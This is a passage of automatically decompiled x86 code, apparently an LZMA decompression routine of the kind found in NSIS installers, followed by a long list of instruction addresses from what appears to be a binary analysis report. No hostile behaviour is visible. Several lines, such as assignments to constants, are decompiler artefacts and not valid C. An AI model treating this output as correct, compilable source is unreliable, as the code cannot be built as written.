                          							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          								goto L48;
                          							}
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								goto L54;
                          							}
                          							L41:
                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          							 *(__ebp - 0x48) = __eax;
                          							__eax = __eax + 1;
                          							__eax = __eax << 8;
                          							__eax = __eax + __ebx;
                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edx = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								 *(__ebp - 0x40) = 1;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								__ebx = __ebx + __ebx + 1;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edx;
                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L39;
                          							} else {
                          								goto L37;
                          							}
                          						case 0xe:
                          							L46:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xe;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t156 = __ebp - 0x70;
                          							 *_t156 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t156;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							while(1) {
                          								L48:
                          								__eflags = __ebx - 0x100;
                          								if(__ebx >= 0x100) {
                          									break;
                          								}
                          								__eax =  *(__ebp - 0x58);
                          								__edx = __ebx + __ebx;
                          								__ecx =  *(__ebp - 0x10);
                          								__esi = __edx + __eax;
                          								__ecx =  *(__ebp - 0x10) >> 0xb;
                          								__ax =  *__esi;
                          								 *(__ebp - 0x54) = __esi;
                          								__edi = __ax & 0x0000ffff;
                          								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          								__eflags =  *(__ebp - 0xc) - __ecx;
                          								if( *(__ebp - 0xc) >= __ecx) {
                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          									__cx = __ax;
                          									_t170 = __edx + 1; // 0x1
                          									__ebx = _t170;
                          									__cx = __ax >> 5;
                          									__eflags = __eax;
                          									 *__esi = __ax;
                          								} else {
                          									 *(__ebp - 0x10) = __ecx;
                          									0x800 = 0x800 - __edi;
                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          									__ebx = __ebx + __ebx;
                          									 *__esi = __cx;
                          								}
                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                          								 *(__ebp - 0x44) = __ebx;
                          								if( *(__ebp - 0x10) >= 0x1000000) {
                          									continue;
                          								} else {
                          									goto L46;
                          								}
                          							}
                          							L54:
                          							_t173 = __ebp - 0x34;
                          							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          							__eflags =  *_t173;
                          							goto L55;
                          						case 0xf:
                          							L58:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xf;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t203 = __ebp - 0x70;
                          							 *_t203 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t203;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L60:
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								L55:
                          								__al =  *(__ebp - 0x44);
                          								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          								goto L56;
                          							}
                          							L61:
                          							__eax =  *(__ebp - 0x58);
                          							__edx = __ebx + __ebx;
                          							__ecx =  *(__ebp - 0x10);
                          							__esi = __edx + __eax;
                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								_t217 = __edx + 1; // 0x1
                          								__ebx = _t217;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L60;
                          							} else {
                          								goto L58;
                          							}
                          						case 0x10:
                          							L109:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x10;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t365 = __ebp - 0x70;
                          							 *_t365 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t365;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							goto L111;
                          						case 0x11:
                          							goto L69;
                          						case 0x12:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 0x58);
                          								 *(__ebp - 0x84) = 0x13;
                          								__esi =  *(__ebp - 0x58) + 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							__eflags = __eax;
                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                          							goto L130;
                          						case 0x13:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								_t469 = __ebp - 0x58;
                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                          								__eflags =  *_t469;
                          								 *(__ebp - 0x30) = 0x10;
                          								 *(__ebp - 0x40) = 8;
                          								L144:
                          								 *(__ebp - 0x7c) = 0x14;
                          								goto L145;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							 *(__ebp - 0x30) = 8;
                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          							L130:
                          							 *(__ebp - 0x58) = __eax;
                          							 *(__ebp - 0x40) = 3;
                          							goto L144;
                          						case 0x14:
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          							__eax =  *(__ebp - 0x80);
                          							goto L140;
                          						case 0x15:
                          							__eax = 0;
                          							__eflags =  *(__ebp - 0x38) - 7;
                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          							__al = __al & 0x000000fd;
                          							__eax = (__eflags >= 0) - 1 + 0xb;
                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          							goto L120;
                          						case 0x16:
                          							__eax =  *(__ebp - 0x30);
                          							__eflags = __eax - 4;
                          							if(__eax >= 4) {
                          								_push(3);
                          								_pop(__eax);
                          							}
                          							__ecx =  *(__ebp - 4);
                          							 *(__ebp - 0x40) = 6;
                          							__eax = __eax << 7;
                          							 *(__ebp - 0x7c) = 0x19;
                          							 *(__ebp - 0x58) = __eax;
                          							goto L145;
                          						case 0x17:
                          							L145:
                          							__eax =  *(__ebp - 0x40);
                          							 *(__ebp - 0x50) = 1;
                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          							goto L149;
                          						case 0x18:
                          							L146:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x18;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t484 = __ebp - 0x70;
                          							 *_t484 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t484;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L148:
                          							_t487 = __ebp - 0x48;
                          							 *_t487 =  *(__ebp - 0x48) - 1;
                          							__eflags =  *_t487;
                          							L149:
                          							__eflags =  *(__ebp - 0x48);
                          							if( *(__ebp - 0x48) <= 0) {
                          								__ecx =  *(__ebp - 0x40);
                          								__ebx =  *(__ebp - 0x50);
                          								0 = 1;
                          								__eax = 1 << __cl;
                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          								__eax =  *(__ebp - 0x7c);
                          								 *(__ebp - 0x44) = __ebx;
                          								goto L140;
                          							}
                          							__eax =  *(__ebp - 0x50);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          							__eax =  *(__ebp - 0x58);
                          							__esi = __edx + __eax;
                          							 *(__ebp - 0x54) = __esi;
                          							__ax =  *__esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								__cx = __ax >> 5;
                          								__eax = __eax - __ecx;
                          								__edx = __edx + 1;
                          								__eflags = __edx;
                          								 *__esi = __ax;
                          								 *(__ebp - 0x50) = __edx;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L148;
                          							} else {
                          								goto L146;
                          							}
                          						case 0x19:
                          							__eflags = __ebx - 4;
                          							if(__ebx < 4) {
                          								 *(__ebp - 0x2c) = __ebx;
                          								L119:
                          								_t393 = __ebp - 0x2c;
                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                          								__eflags =  *_t393;
                          								L120:
                          								__eax =  *(__ebp - 0x2c);
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          									goto L170;
                          								}
                          								__eflags = __eax -  *(__ebp - 0x60);
                          								if(__eax >  *(__ebp - 0x60)) {
                          									goto L171;
                          								}
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          								__eax =  *(__ebp - 0x30);
                          								_t400 = __ebp - 0x60;
                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          								__eflags =  *_t400;
                          								goto L123;
                          							}
                          							__ecx = __ebx;
                          							__eax = __ebx;
                          							__ecx = __ebx >> 1;
                          							__eax = __ebx & 0x00000001;
                          							__ecx = (__ebx >> 1) - 1;
                          							__al = __al | 0x00000002;
                          							__eax = (__ebx & 0x00000001) << __cl;
                          							__eflags = __ebx - 0xe;
                          							 *(__ebp - 0x2c) = __eax;
                          							if(__ebx >= 0xe) {
                          								__ebx = 0;
                          								 *(__ebp - 0x48) = __ecx;
                          								L102:
                          								__eflags =  *(__ebp - 0x48);
                          								if( *(__ebp - 0x48) <= 0) {
                          									__eax = __eax + __ebx;
                          									 *(__ebp - 0x40) = 4;
                          									 *(__ebp - 0x2c) = __eax;
                          									__eax =  *(__ebp - 4);
                          									__eax =  *(__ebp - 4) + 0x644;
                          									__eflags = __eax;
                          									L108:
                          									__ebx = 0;
                          									 *(__ebp - 0x58) = __eax;
                          									 *(__ebp - 0x50) = 1;
                          									 *(__ebp - 0x44) = 0;
                          									 *(__ebp - 0x48) = 0;
                          									L112:
                          									__eax =  *(__ebp - 0x40);
                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          										_t391 = __ebp - 0x2c;
                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          										__eflags =  *_t391;
                          										goto L119;
                          									}
                          									__eax =  *(__ebp - 0x50);
                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          									__eax =  *(__ebp - 0x58);
                          									__esi = __edi + __eax;
                          									 *(__ebp - 0x54) = __esi;
                          									__ax =  *__esi;
                          									__ecx = __ax & 0x0000ffff;
                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          									__eflags =  *(__ebp - 0xc) - __edx;
                          									if( *(__ebp - 0xc) >= __edx) {
                          										__ecx = 0;
                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          										__ecx = 1;
                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          										__ebx = 1;
                          										__ecx =  *(__ebp - 0x48);
                          										__ebx = 1 << __cl;
                          										__ecx = 1 << __cl;
                          										__ebx =  *(__ebp - 0x44);
                          										__ebx =  *(__ebp - 0x44) | __ecx;
                          										__cx = __ax;
                          										__cx = __ax >> 5;
                          										__eax = __eax - __ecx;
                          										__edi = __edi + 1;
                          										__eflags = __edi;
                          										 *(__ebp - 0x44) = __ebx;
                          										 *__esi = __ax;
                          										 *(__ebp - 0x50) = __edi;
                          									} else {
                          										 *(__ebp - 0x10) = __edx;
                          										0x800 = 0x800 - __ecx;
                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          										 *__esi = __dx;
                          									}
                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                          									if( *(__ebp - 0x10) >= 0x1000000) {
                          										L111:
                          										_t368 = __ebp - 0x48;
                          										 *_t368 =  *(__ebp - 0x48) + 1;
                          										__eflags =  *_t368;
                          										goto L112;
                          									} else {
                          										goto L109;
                          									}
                          								}
                          								__ecx =  *(__ebp - 0xc);
                          								__ebx = __ebx + __ebx;
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          								 *(__ebp - 0x44) = __ebx;
                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          									__ecx =  *(__ebp - 0x10);
                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          									__ebx = __ebx | 0x00000001;
                          									__eflags = __ebx;
                          									 *(__ebp - 0x44) = __ebx;
                          								}
                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                          								if( *(__ebp - 0x10) >= 0x1000000) {
                          									L101:
                          									_t338 = __ebp - 0x48;
                          									 *_t338 =  *(__ebp - 0x48) - 1;
                          									__eflags =  *_t338;
                          									goto L102;
                          								} else {
                          									goto L99;
                          								}
                          							}
                          							__edx =  *(__ebp - 4);
                          							__eax = __eax - __ebx;
                          							 *(__ebp - 0x40) = __ecx;
                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          							goto L108;
                          						case 0x1a:
                          							L56:
                          							__eflags =  *(__ebp - 0x64);
                          							if( *(__ebp - 0x64) == 0) {
                          								 *(__ebp - 0x88) = 0x1a;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x68);
                          							__al =  *(__ebp - 0x5c);
                          							__edx =  *(__ebp - 8);
                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          							 *( *(__ebp - 0x68)) = __al;
                          							__ecx =  *(__ebp - 0x14);
                          							 *(__ecx +  *(__ebp - 8)) = __al;
                          							__eax = __ecx + 1;
                          							__edx = 0;
                          							_t192 = __eax %  *(__ebp - 0x74);
                          							__eax = __eax /  *(__ebp - 0x74);
                          							__edx = _t192;
                          							goto L79;
                          						case 0x1b:
                          							goto L75;
                          						case 0x1c:
                          							while(1) {
                          								L123:
                          								__eflags =  *(__ebp - 0x64);
                          								if( *(__ebp - 0x64) == 0) {
                          									break;
                          								}
                          								__eax =  *(__ebp - 0x14);
                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          								__eflags = __eax -  *(__ebp - 0x74);
                          								if(__eax >=  *(__ebp - 0x74)) {
                          									__eax = __eax +  *(__ebp - 0x74);
                          									__eflags = __eax;
                          								}
                          								__edx =  *(__ebp - 8);
                          								__cl =  *(__eax + __edx);
                          								__eax =  *(__ebp - 0x14);
                          								 *(__ebp - 0x5c) = __cl;
                          								 *(__eax + __edx) = __cl;
                          								__eax = __eax + 1;
                          								__edx = 0;
                          								_t414 = __eax %  *(__ebp - 0x74);
                          								__eax = __eax /  *(__ebp - 0x74);
                          								__edx = _t414;
                          								__eax =  *(__ebp - 0x68);
                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          								__eflags =  *(__ebp - 0x30);
                          								 *( *(__ebp - 0x68)) = __cl;
                          								 *(__ebp - 0x14) = _t414;
                          								if( *(__ebp - 0x30) > 0) {
                          									continue;
                          								} else {
                          									goto L80;
                          								}
                          							}
                          							 *(__ebp - 0x88) = 0x1c;
                          							goto L170;
                          					}
                          				}
                          			}













                          0x00000000
                          0x00406398
                          0x00406398
                          0x0040639c
                          0x00406453
                          0x00406456
                          0x00406462
                          0x00406343
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00406709
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x00000000
                          0x0040672b
                          0x004063a2
                          0x004063a6
                          0x004068e7
                          0x004068e7
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x004063ac
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x00000000
                          0x004068e3
                          0x004063c6
                          0x004063c9
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x004063fa
                          0x004063fa
                          0x004063fa
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x00000000
                          0x004060d9
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
